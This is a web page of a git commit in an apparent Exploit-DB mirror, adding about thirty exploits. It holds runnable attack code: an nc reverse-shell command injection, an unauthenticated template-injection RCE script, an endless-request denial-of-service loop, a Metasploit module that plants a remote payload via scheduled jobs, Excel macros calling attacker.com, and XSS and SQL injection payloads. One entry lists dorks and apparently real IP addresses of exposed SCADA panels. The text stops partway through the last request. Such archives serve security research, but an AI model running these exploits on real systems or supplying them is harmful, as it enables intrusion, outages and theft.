bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-04-09

Browse source 
34 changes to exploits/shellcodes/ghdb

ENTAB ERP 1.0 - Username PII leak

ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)

ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)

FortiRecorder 6.4.3 - Denial of Service

Schneider Electric v1.0 - Directory traversal & Broken Authentication

Altenergy Power Control Software C1.2.5 - OS command injection

Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)

Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)

Google Chrome  109.0.5414.74 - Code Execution via missing lib file (Ubuntu)

Lucee Scheduled Job v1.0 -  Command Execution

Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)

Adobe Connect 11.4.5 - Local File Disclosure

Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)

Suprema BioStar 2 v2.8.16 - SQL Injection

Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)

dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)

GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure

Icinga Web 2.10 - Arbitrary File Disclosure

Joomla! v4.2.8 - Unauthenticated information disclosure

Medicine Tracker System v1.0 - Sql Injection

Online Appointment System V1.0 - Cross-Site Scripting (XSS)

Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)

pfsenseCE v2.6.0 - Anti-brute force protection bypass

Restaurant Management System 1.0  - SQL Injection

WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)
X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)
X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)

Microsoft Windows 11 - 'cmd.exe' Denial of Service

ActFax 10.10 - Unquoted Path Services

ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path

RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution

Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation
This commit is contained in:
Exploit-DB 2023-04-09 00:16:30 +00:00
parent 99cef8d064
commit 85954a8fad
33 changed files with 2254 additions and 36 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

28
exploits/asp/webapps/51335.txt Normal file
View file

@ -0,0 +1,28 @@
Exploit Title: ENTAB ERP 1.0 - Username PII leak
Date: 17.05.2022
Exploit Author: Deb Prasad Banerjee
Vendor Homepage: https://www.entab.in
Version: Entab ERP 1.0
Tested on: Windows IIS
CVE: CVE-2022-30076
Vulnerability Name: Broken Access control via Rate Limits
Description:
In the entab software in fapscampuscare.in, there is a login portal with a
UserId field. An authenticated user would enter and get their name as well
as other services. However, there should be a rate limit in place, which is
not present. As a result, a hacker could bypass the system and obtain other
usernames via broken access control. This enables a threat actor to
obain the complete full name and user ID of the person.
POC:
1. Go to fapscampuscare.in or any entab hosted software and find the entab
software.
2. Use a proxy to intercept the request.
3. Since it's a student login, try a random UserId (e.g., s11111).
4. Intercept the request using Burp Suite and send it to the Intruder.
5. Select payloads from number 100000-20000, and turn off URL encoding on
the UserId parameter.
6. Start the attack and sort by length to obtain the username and full name
of other users.

4
exploits/aspx/webapps/51118.txt
View file

@ -19,5 +19,5 @@ POBatch
WaitDuration WaitDuration
#Final URLs #Final URLs
http://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3 http://localost:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3
http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script> http://localost:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>

20
exploits/cgi/webapps/51347.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)
# Date: 2023-03-30
# CVE: CVE-2023-26692
# Exploit Author: Abdulaziz Saad (@b4zb0z)
# Vendor Homepage: https://www.zcbs.nl
# Version: 4.14k
# Tested on: LAMP, Ubuntu
# Google Dork: inurl:objecten.pl?ident=3D
---
[#] Vulnerability :
`$_GET['ident']`
[#] Exploitation :
`https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror=
=3Dalert(%22XSS%22)%3E`

67
exploits/hardware/dos/51326.py Executable file
View file

@ -0,0 +1,67 @@
# Exploit Title: FortiRecorder 6.4.3 - Denial of Service
# Google Dork: N/A
# Date: 13/03/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/network-based-video-security/forticam-fortirecorder
# Version: 6.4.3 and below && 6.0.11 to 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-41333
# Security Advisory: https://www.fortiguard.com/psirt/FG-IR-22-388
# Technical Analysis: https://medium.com/@0xpolar/cve-2022-41333-71eb289d60b5
import requests
import warnings
import sys
from urllib.parse import unquote
warnings.filterwarnings('ignore', message='Unverified HTTPS request')
def POST(target, req_type, payload):
print("[+] Target : "+target)
print("[+] Request Type: POST")
print("[+] Payload : " +payload)
post_url = target+"/module/admin.fe"
post_headers = {"User-Agent": "CVE-2022-41333", "Content-Type": "application/x-www-form-urlencoded"}
url_decoder = unquote(payload)
full_payload = "fewReq="+url_decoder
while True:
r = requests.post(post_url, headers=post_headers, data=full_payload, verify=False)
if "Failed: Access denied" in r.text:
print("[+] Payload Sent.")
else:
print("[!] Something went wrong!")
print(r.text)
def GET(target, req_type, payload):
print("[+] Target : "+target)
print("[+] Request Type: GET")
print("[+] Payload : " +payload)
while True:
url = target+"/module/admin.fe?fewReq="+payload
headers = {"User-Agent": "CVE-2022-41333", "Connection": "close"}
r = requests.get(url, headers=headers, verify=False)
if "Failed: Access denied" in r.text:
print("[+] Payload Sent.")
else:
print("[!] Something went wrong!")
print(r.text)
print("[+] Starting ..")
target = str((sys.argv[1])) # https://fortirecorder.fortidemo.com
req_type = str((sys.argv[2])) # POST or GET
payload = str((sys.argv[3])) # :B:JSsrJW16blB9dXp8ayJMZmxcfnJee3J2cTltem5efGt2cHEiLio5amx6bXF+cnoi
if "post" in req_type.lower():
if "https" in target.lower() or "http" in target.lower():
POST(target, req_type, payload)
else:
print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
elif "get" in req_type.lower():
if "https" in target.lower() or "http" in target.lower():
GET(target, req_type, payload)
else:
print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
else:
print("[!] Invalid Request Type.")

38
exploits/hardware/remote/51320.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: Schneider Electric v1.0 - Directory traversal & Broken Authentication
# Google Dork: inurl:/scada-vis
# Date: 3/11/2023
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: https://www.se.com/
# Version: all-versions
# Tested on: Windows/Linux/Android
# Attacker can using these dorks and access to the panel without password
inurl:/cgi-bin/scada-vis/
inurl:/scada-vis/schedulers
inurl:/cgi-bin/scada-vis/index.cgi
inurl:/scada-vis
inurl:/cgi-bin/scada-vis/touch.html
POC :
http://185.73.103.144:8080/cgi-bin/scada-vis/index.cgi
http://185.73.103.38:8080/cgi-bin/scada-vis/touch.html
http://88.213.153.98/cgi-bin/scada-vis/schedulers.cgi
# Attacker can these this dork for bruteforce the panel
inurl:/scada-vis/pin?return=index
POC :
http://143.176.129.1/scada-vis/pin?return=index
http://62.163.74.206/scada-vis/pin?return=touch

53
exploits/hardware/webapps/51325.py Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title: Altenergy Power Control Software C1.2.5 - OS command injection
# Google Dork: intitle:"Altenergy Power Control Software"
# Date: 15/3/2023
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://apsystems.com/
# Version: C1.2.5
# Tested on: Windows 10
# CVE : CVE-2023-28343
import requests
import argparse
def exploit(target,attacker,port):
url = f'{target}/index.php/management/set_timezone'
headers = {
'Accept': 'application/json, text/javascript, */*; q=0.01',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin': f'{target}',
'Referer': f'{target}/index.php/management/datetime',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9',
'Connection': 'close'
}
print(f"Sending Request")
data = {
'timezone': f'`mknod /tmp/pipe p;/bin/sh 0</tmp/pipe | nc
{attacker} {port} 1>/tmp/pipe`'
}
response = requests.post(url, headers=headers, data=data)
# print(response.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Parse target, attacker,
and port.',)
parser.add_argument('--target','-t', type=str, help='The target IP
address or hostname. example : http://192.168.254')
parser.add_argument('--attacker','-a', type=str, help='The attacker IP
address or hostname.')
parser.add_argument('--port', '-p',type=int, help='Listening port')
args = parser.parse_args()
try:
exploit(args.target,args.attacker,args.port)
except:
parser.print_help()
print("Exploit done")

60
exploits/java/webapps/51339.java Normal file
View file

@ -0,0 +1,60 @@
// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)
// Google Dork: title:"GoAnywhere"
// Date: 3/26/2023
// Exploit Author: Youssef Muhammad
// Vendor Homepage: https://www.goanywhere.com/
// Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0
// Version: > 7.1.1 for windows / > 7.0.3 for Linux
// Tested on: Windows, Linux
// CVE : CVE-2023-0669
// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution
import java.util.Base64;
import javax.crypto.Cipher;
import java.nio.charset.StandardCharsets;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.file.Files;
import java.nio.file.Paths;
public class CVE_2023_0669_helper {
static String ALGORITHM = "AES/CBC/PKCS5Padding";
static byte[] KEY = new byte[30];
static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);
public static void main(String[] args) throws Exception {
if (args.length != 2) {
System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");
System.exit(1);
}
String filePath = args[0];
String version = args[1];
byte[] fileContent = Files.readAllBytes(Paths.get(filePath));
String encryptedContent = encrypt(fileContent, version);
System.out.println(encryptedContent);
}
public static String encrypt(byte[] data, String version) throws Exception {
Cipher cipher = Cipher.getInstance(ALGORITHM);
KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue();
SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES");
IvParameterSpec ivSpec = new IvParameterSpec(IV);
cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);
byte[] encryptedObject = cipher.doFinal(data);
String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);
String v = (version.equals("2")) ? "$2" : "";
bundle += v;
return bundle;
}
private static byte[] getInitializationValue() throws Exception {
// Version 1 Encryption
String param1 = "go@nywhereLicenseP@$$wrd";
byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};
return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded();
}
private static byte[] getInitializationValueV2() throws Exception {
// Version 2 Encryption
String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";
byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};
return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded();
}
}

28
exploits/jsp/webapps/51350.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
# Author: dwbzn
# Date: 2022-04-04
# Vendor: https://www.hitachivantara.com/
# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html
# Version: Pentaho BA Server 9.3.0.0-428
# CVE: CVE-2022-43769, CVE-2022-43939
# Tested on: Windows 11
# Credits: https://research.aurainfosec.io/pentest/pentah0wnage
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).
# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)
import requests
import argparse
parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')
parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')
parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)
args = parser.parse_args()
url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"
print ("running...")
r = requests.get(url)
if r.text == 'false':
print ("command should've executed! nice.")
else:
print ("didn't work. sadge...")

58
exploits/linux/local/51331.txt Normal file
View file

@ -0,0 +1,58 @@
#Exploit Title: Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu)
Product: Google Chrome
Discovered by: Rafay Baloch and Muhammad Samak
#Version: 109.0.5414.74
#Impact: Moderate
#Company: Cyber Citadel
#Website: https://www.cybercitadel.com
#Tested-on : Ubuntu 22.04.1
*Description*
Google chrome attempts to load the 'libssckbi.so' file from a user-writable location.
PATH: /home/$username/.pki/nssdb/libnssckbi.so
Since the Shared Library 'ibnssckbi.so' specified path is writeable.
It is possible to achieve the Code Execution by placing the malicious file with
the name `libnssckbi.so` in the specified path.
*exploit*
Following is the POC that could be used to reproduce the issue:
echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..."
echo "[*] Checking /.pki/nssdb PATH"
if [ -d "/home/haalim/.pki/nssdb" ]
then
echo "[+] Directory Exists..."
if [ -w "/home/haalim/.pki/nssdb" ]
then
echo "[+] Directory is writable..."
echo "[+] Directory is writable..."
echo "[+] Generating malicious File libnssckbi.so ..."
echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c
echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c
echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c
echo "}" >> /home/haalim/.pki/nssdb/exploit.c
gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o
gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o
fi
fi
Upon closing the browser windows, the application executes the malicious code
*Impact*
The attacker can use this behavior to bypass the application whitelisting rules.
This behavior can also lead to DoS attacks.
An attacker can trick a victim into supplying credentials by creating a fake prompt.

331
exploits/multiple/local/51333.rb Executable file
View file

@ -0,0 +1,331 @@
# Exploit Title: Lucee Scheduled Job v1.0 - Command Execution
# Date: 3-23-2012
# Exploit Author: Alexander Philiotis
# Vendor Homepage: https://www.lucee.org/
# Software Link: https://download.lucee.org/
# Version: All versions with scheduled jobs enabled
# Tested on: Linux - Debian, Lubuntu & Windows 10
# Ref : https://www.synercomm.com/blog/scheduled-tasks-with-lucee-abusing-built-in-functionality-for-command-execution/
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Retry
include Msf::Exploit::FileDropper
require 'base64'
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Lucee Authenticated Scheduled Job Code Execution',
'Description' => %q{
This module can be used to execute a payload on Lucee servers that have an exposed
administrative web interface. It's possible for an administrator to create a
scheduled job that queries a remote ColdFusion file, which is then downloaded and executed
when accessed. The payload is uploaded as a cfm file when queried by the target server. When executed,
the payload will run as the user specified during the Lucee installation. On Windows, this is a service account;
on Linux, it is either the root user or lucee.
},
'Targets' => [
[
'Windows Command',
{
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Type' => :windows_cmd
}
],
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd
}
]
],
'Author' => 'Alexander Philiotis', # aphiliotis@synercomm.com
'License' => MSF_LICENSE,
'References' => [
# This abuses the functionality inherent to the Lucee platform and
# thus is not related to any CVEs.
# Lucee Docs
['URL', 'https://docs.lucee.org/'],
# cfexecute & cfscript documentation
['URL', 'https://docs.lucee.org/reference/tags/execute.html'],
['URL', 'https://docs.lucee.org/reference/tags/script.html'],
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
# /opt/lucee/server/lucee-server/context/logs/application.log
# /opt/lucee/web/logs/exception.log
IOC_IN_LOGS,
ARTIFACTS_ON_DISK,
# ColdFusion files located at the webroot of the Lucee server
# C:/lucee/tomcat/webapps/ROOT/ by default on Windows
# /opt/lucee/tomcat/webapps/ROOT/ by default on Linux
]
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'DisclosureDate' => '2023-02-10'
)
)
register_options(
[
Opt::RPORT(8888),
OptString.new('PASSWORD', [false, 'The password for the administrative interface']),
OptString.new('TARGETURI', [true, 'The path to the admin interface.', '/lucee/admin/web.cfm']),
OptInt.new('PAYLOAD_DEPLOY_TIMEOUT', [false, 'Time in seconds to wait for access to the payload', 20]),
]
)
deregister_options('URIPATH')
end
def exploit
payload_base = rand_text_alphanumeric(8..16)
authenticate
start_service({
'Uri' => {
'Proc' => proc do |cli, req|
print_status("Payload request received for #{req.uri} from #{cli.peerhost}")
send_response(cli, cfm_stub)
end,
'Path' => '/' + payload_base + '.cfm'
}
})
#
# Create the scheduled job
#
create_job(payload_base)
#
# Execute the scheduled job and attempt to send a GET request to it.
#
execute_job(payload_base)
print_good('Exploit completed.')
#
# Removes the scheduled job
#
print_status('Removing scheduled job ' + payload_base)
cleanup_request = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_get' => {
'action' => 'services.schedule'
},
'vars_post' => {
'row_1' => '1',
'name_1' => payload_base.to_s,
'mainAction' => 'delete'
}
})
if cleanup_request && cleanup_request.code == 302
print_good('Scheduled job removed.')
else
print_bad('Failed to remove scheduled job.')
end
end
def authenticate
auth = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'keep_cookies' => true,
'vars_post' => {
'login_passwordweb' => datastore['PASSWORD'],
'lang' => 'en',
'rememberMe' => 's',
'submit' => 'submit'
}
})
unless auth
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
unless auth.code == 200 && auth.body.include?('nav_Security')
fail_with(Failure::NoAccess, 'Unable to authenticate. Please double check your credentials and try again.')
end
print_good('Authenticated successfully')
end
def create_job(payload_base)
create_job = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'keep_cookies' => true,
'vars_get' => {
'action' => 'services.schedule',
'action2' => 'create'
},
'vars_post' => {
'name' => payload_base,
'url' => get_uri.to_s,
'interval' => '3600',
'start_day' => '01',
'start_month' => '02',
'start_year' => '2023',
'start_hour' => '00',
'start_minute' => '00',
'start_second' => '00',
'run' => 'create'
}
})
fail_with(Failure::Unreachable, 'Could not connect to the web service') if create_job.nil?
fail_with(Failure::UnexpectedReply, 'Unable to create job') unless create_job.code == 302
print_good('Job ' + payload_base + ' created successfully')
job_file_path = file_path = webroot
fail_with(Failure::UnexpectedReply, 'Could not identify the web root') if job_file_path.blank?
case target['Type']
when :unix_cmd
file_path << '/'
job_file_path = "#{job_file_path.gsub('/', '//')}//"
when :windows_cmd
file_path << '\\'
job_file_path = "#{job_file_path.gsub('\\', '\\\\')}\\"
end
update_job = send_request_cgi({
'method' => 'POST',
'uri' => target_uri.path,
'keep_cookies' => true,
'vars_get' => {
'action' => 'services.schedule',
'action2' => 'edit',
'task' => create_job.headers['location'].split('=')[-1]
},
'vars_post' => {
'name' => payload_base,
'url' => get_uri.to_s,
'port' => datastore['SRVPORT'],
'timeout' => '50',
'username' => '',
'password' => '',
'proxyserver' => '',
'proxyport' => '',
'proxyuser' => '',
'proxypassword' => '',
'publish' => 'true',
'file' => "#{job_file_path}#{payload_base}.cfm",
'start_day' => '01',
'start_month' => '02',
'start_year' => '2023',
'start_hour' => '00',
'start_minute' => '00',
'start_second' => '00',
'end_day' => '',
'end_month' => '',
'end_year' => '',
'end_hour' => '',
'end_minute' => '',
'end_second' => '',
'interval_hour' => '1',
'interval_minute' => '0',
'interval_second' => '0',
'run' => 'update'
}
})
fail_with(Failure::Unreachable, 'Could not connect to the web service') if update_job.nil?
fail_with(Failure::UnexpectedReply, 'Unable to update job') unless update_job.code == 302 || update_job.code == 200
register_files_for_cleanup("#{file_path}#{payload_base}.cfm")
print_good('Job ' + payload_base + ' updated successfully')
end
def execute_job(payload_base)
print_status("Executing scheduled job: #{payload_base}")
job_execution = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_get' => {
'action' => 'services.schedule'
},
'vars_post' => {
'row_1' => '1',
'name_1' => payload_base,
'mainAction' => 'execute'
}
})
fail_with(Failure::Unreachable, 'Could not connect to the web service') if job_execution.nil?
fail_with(Failure::Unknown, 'Unable to execute job') unless job_execution.code == 302 || job_execution.code == 200
print_good('Job ' + payload_base + ' executed successfully')
payload_response = nil
retry_until_truthy(timeout: datastore['PAYLOAD_DEPLOY_TIMEOUT']) do
print_status('Attempting to access payload...')
payload_response = send_request_cgi(
'uri' => '/' + payload_base + '.cfm',
'method' => 'GET'
)
payload_response.nil? || (payload_response && payload_response.code == 200 && payload_response.body.exclude?('Error')) || (payload_response.code == 500)
end
# Unix systems tend to return a 500 response code when executing a shell. Windows tends to return a nil response, hence the check for both.
fail_with(Failure::Unknown, 'Unable to execute payload') unless payload_response.nil? || payload_response.code == 200 || payload_response.code == 500
if payload_response.nil?
print_status('No response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!'))
elsif payload_response.code == 200
print_good('Received 200 response from ' + payload_base + '.cfm')
output = payload_response.body.strip
if output.include?("\n")
print_good('Output:')
print_line(output)
elsif output.present?
print_good('Output: ' + output)
end
elsif payload_response.code == 500
print_status('Received 500 response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!'))
end
end
def webroot
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
return nil unless res
res.get_html_document.at('[text()*="Webroot"]')&.next&.next&.text
end
def cfm_stub
case target['Type']
when :windows_cmd
<<~CFM.gsub(/^\s+/, '').tr("\n", '')
<cfscript>
cfexecute(name="cmd.exe", arguments="/c " & toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64")),timeout=5);
</cfscript>
CFM
when :unix_cmd
<<~CFM.gsub(/^\s+/, '').tr("\n", '')
<cfscript>
cfexecute(name="/bin/bash", arguments=["-c", toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64"))],timeout=5);
</cfscript>
CFM
end
end
end

58
exploits/multiple/remote/51328.txt Normal file
View file

@ -0,0 +1,58 @@
## Exploit Title: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)
## Exploit Author: nu11secur1ty
## Date: 03.16.2023
## Vendor: https://www.microsoft.com/en-us/microsoft-365/excel
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://www.invicti.com/learn/remote-code-execution-rce/
## CVE ID: CVE-2023-23399
## Description:
The malicious user can exploit the victim's PC remotely.
For example, when the score indicates that the Attack Vector is Local
and User Interaction is Required, this could describe an exploit in
which an attacker, through social engineering, convinces a victim to
download and open a specially crafted file from a website which leads
to a local attack on their computer.
STATUS: HIGH Vulnerability
[+]Exploit0:
```
Sub Check_your_salaries()
CreateObject("Shell.Application").ShellExecute
"microsoft-edge:https://attacker.com"
End Sub
```
[+]Exploit1:
```
Sub cmd()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "cmd.exe"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399)
## Proof and Exploit:
[href](https://streamable.com/dnyfx0)
## Time spend:
03:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

41
exploits/multiple/webapps/51327.txt Normal file
View file

@ -0,0 +1,41 @@
# Title: Adobe Connect 11.4.5 - Local File Disclosure
# Author: h4shur
# date:2021.01.16-2023.02.17
# CVE: CVE-2023-22232
# Vendor Homepage: https://www.adobe.com
# Software Link: https://www.adobe.com/products/adobeconnect.html
# Version: 11.4.5 and earlier, 12.1.5 and earlier
# User interaction: None
# Tested on: Windows 10 & Google Chrome, kali linux & firefox
### Summary:
Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature.
Exploitation of this issue does not require user interaction.
### Description :
There are many web applications in the world, each of which has vulnerabilities due to developer errors, and this is a problem for all of them, and even the best of them, like the "adobe connect" program, have vulnerabilities that occur every month. They are found and fixed by the team.
* What is LFD bug?
LFD bug stands for Local File Disclosure / Download, which generally allows the attacker to read and download files within the server, so it can be considered a very dangerous bug in the web world and programmers must be aware of it. Be careful and maintain security against this bug
* Intruder access level with LFD bug
The level of access using this bug can be even increased to the level of access to the website database in such a way that the hacker reads sensitive files inside the server that contain database entry information and enters the database and by extracting the information The admin will have a high level of access
* Identify vulnerable sites
To search for LFD bugs, you should check the site inputs. If there is no problem with receiving ./ characters, you can do the test to read the files inside the server if they are vulnerable. Enter it and see if it is read or not, or you can use files inside the server such as / etc / passwd / .. and step by step using ../ to return to the previous path to find the passwd file
* And this time the "lfd" in "adobe connect" bug:
To download and exploit files, you must type the file path in the "download-url" variable and the file name and extension in the "name" variable.
You can download the file by writing the file path and file name and extension.
When you have written the file path, file name and extension in the site address variables, a download page from Adobe Connect will open for you, with "Save to My Computer
file name]" written in the download box and a file download link at the bottom of the download box, so you can download the file.
* There are values inside the url that do not allow a file other than this file to be downloaded.
* Values: sco_id and tickets
But if these values are cleared, you will see that reloading is possible without any obstacles
At another address, you can download multiple files as a zip file.
We put the address of the files in front of the variable "ffn" and if we want to add the file, we add the variable "ffn" again and put the address of the file in front of it. The "download_type" variable is also used to specify the zip extension.
### POC :
https://target.com/[folder]/download?download-url=[URL]&name=[file.type]
https://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[base file folder]
### References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22232
https://nvd.nist.gov/vuln/detail/CVE-2023-22232
https://helpx.adobe.com/security/products/connect/apsb23-05.html

97
exploits/multiple/webapps/51340.txt Normal file
View file

@ -0,0 +1,97 @@
# Exploit Title: Suprema BioStar 2 v2.8.16 - SQL Injection
# Date: 26/03/2023
# Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/)
# Vendor Homepage: https://www.supremainc.com/
# Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp
# Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide
# Version: 2.8.16
# Tested on: Windows, Linux
# CVE-2023-27167
## Description
A Boolean-based SQL injection/Time based SQL vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "values" JSON parameter.
## Request PoC #1
'''
POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 204
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}}
'''
Time based SQL injection (set 4 response delays for 8 seconds).
'''
## Request PoC #2
'''
POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
